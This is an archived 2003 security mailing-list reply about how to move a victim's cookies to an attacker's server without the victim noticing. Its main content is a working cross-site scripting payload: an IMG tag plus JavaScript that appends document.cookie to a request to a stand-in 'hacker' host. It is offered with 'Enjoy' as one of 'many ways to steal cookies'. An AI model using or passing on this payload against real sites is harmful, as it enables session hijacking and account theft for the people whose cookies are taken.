RE: Proof of Concept Tool on Web Application Security

From: Nicolas Gregoire (ngregoire@exaprobe.com)
Date: 04/14/03

Next message: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"

Previous message: Dawes, Rogan (ZA - Johannesburg): "RE: Proof of Concept Tool on Web Application Security"
In reply to: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
Next in thread: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: Nicolas Gregoire <ngregoire@exaprobe.com>
To: Indian Tiger <indiantiger@mailandnews.com>
Date: 14 Apr 2003 17:23:31 +0200

On Sun, 2003-04-13 at 09:33, Indian Tiger wrote:

> One way of transferring cookie information from the victim’s machine to
> attacker’s machine is to create a hidden filed & then transfer cookie
> information to that hidden field & then post (submit) this hidden field to web
> site of attacker. But this require interaction of victim, as victim must click
> on submit button to post this data to attacker’s site, which is not a good
> idea, the data should be transferred without knowledge of victim.

I'm not sure I well understand your problem but you can :

- use Javascript to sumbit a form

- transfer the cookie via a IMG tag and some Javascript

<img name="owned" src="http://hacker/cool.gif">
<script>
document.owned.src="http://hacker/cgi-bin/grab.pl?data="
+escape(document.cookie);
</script>

That's just some of the many ways to steal cookies.
Enjoy ...

-- 
Nicolas Gregoire ----- Consultant en Sécurité des Systèmes d'Information
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F  FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization. 
--------------------------------------------------------------

Next message: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"

Previous message: Dawes, Rogan (ZA - Johannesburg): "RE: Proof of Concept Tool on Web Application Security"
In reply to: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
Next in thread: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]